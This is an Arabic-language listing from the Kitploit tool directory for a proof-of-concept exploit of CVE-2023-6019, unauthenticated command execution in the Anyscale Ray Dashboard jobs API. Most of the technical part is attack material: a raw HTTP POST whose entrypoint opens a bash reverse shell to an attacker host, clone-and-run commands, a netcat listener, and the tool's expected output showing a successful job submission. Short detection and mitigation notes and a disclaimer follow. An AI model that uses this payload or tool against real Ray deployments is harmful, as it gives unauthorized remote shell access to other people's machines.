Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-6019 — استغلال إثبات المفهوم لـ CVE-2023-6019 - تنفيذ تعليمات برمجية عن بُعد عبر واجهة برمجة تطبيقات وظائف لوحة تحكم Ray غير المصادق عليها. | Kitploit
أدوات/GitHubGitHub/joaquinrrr/cve-2023-6019
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

استغلال إثبات المفهوم لـ CVE-2023-6019 - تنفيذ تعليمات برمجية عن بُعد عبر واجهة برمجة تطبيقات وظائف لوحة تحكم Ray غير المصادق عليها.

عرض المستودع
6منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-6019 - Anyscale Ray Dashboard تنفيذ أوامر عن بُعد غير مصادق

أداة إثبات مفهوم لـ CVE-2023-6019 — تنفيذ أوامر عن بُعد عبر واجهة برمجة تطبيقات وظائف Ray Dashboard غير المصادق عليها.
إعداد oguiii


الوصف

Anyscale Ray هو إطار عمل مفتوح المصدر لأحمال العمل الموزعة في التعلم الآلي والذكاء الاصطناعي. الإصدارات السابقة لـ 2.6.4 تعرض واجهة برمجة تطبيقات لتقديم الوظائف من خلال Ray Dashboard (المنفذ الافتراضي 8265) بدون أي مصادقة، مما يسمح للمهاجم غير المصادق بتقديم وظائف عشوائية وتحقيق تنفيذ أوامر عن بُعد على المضيف.

  • CVE: CVE-2023-6019
  • الخطورة: حرجة (CVSS 9.8)
  • الإصدارات المتأثرة: Ray < 2.6.4
  • تم الإصلاح في: Ray 2.6.4
  • ناقل الهجوم: شبكة (طلب HTTP غير مصادق)

كيفية العمل

يقبل نقطة النهاية /api/jobs/ حمولة JSON تحتوي على حقل entrypoint يتم تنفيذه كأمر شل بواسطة عملية Ray العاملة - بدون الحاجة إلى بيانات اعتماد.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

الاستخدام

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

الوسائط

مثال

root@kitploit:~
# بدء المستمع
nc -lvnp 4444

# تشغيل الأداة
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

الناتج المتوقع

root@kitploit:~
[*] التحقق من إصدار Ray على 192.168.1.100:8265...
[*] إصدار واجهة برمجة تطبيقات Ray : 4
[*] إصدار Ray                     : 2.6.3
[+] ثغرة! إصدار Ray 2.6.3 متأثر بـ CVE-2023-6019

[*] الهدف        : http://192.168.1.100:8265/api/jobs/
[*] الشل العكسي  : 192.168.1.10:4444
[*] جارٍ تقديم الوظيفة...

[+] تم تقديم الوظيفة بنجاح!
[+] معرف الوظيفة: raysubmit_Gztg89LZuTa8Jevc

[>] تأكد من أن المستمع جاهز:
    nc -lvnp 4444

الاكتشاف

ابحث عن طلبات POST غير متوقعة إلى /api/jobs/ على المنفذ 8265 في سجلات HTTP الخاصة بك أو حركة الشبكة.


التخفيف

  • الترقية إلى Ray >= 2.6.4
  • تقييد الوصول إلى منفذ Ray Dashboard (8265) عبر قواعد جدار الحماية
  • لا تعرض Ray Dashboard للشبكات العامة

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

إخلاء مسؤولية

هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
احصل دائمًا على إذن كتابي مناسب قبل الاختبار.

تنزيل الأداة
العَلَمالوصفالافتراضي
-tعنوان IP الهدف أو اسم المضيفمطلوب
-pمنفذ Ray Dashboard8265
-lعنوان IP للمهاجم (شل عكسي)مطلوب
-lpمنفذ المهاجم (شل عكسي)مطلوب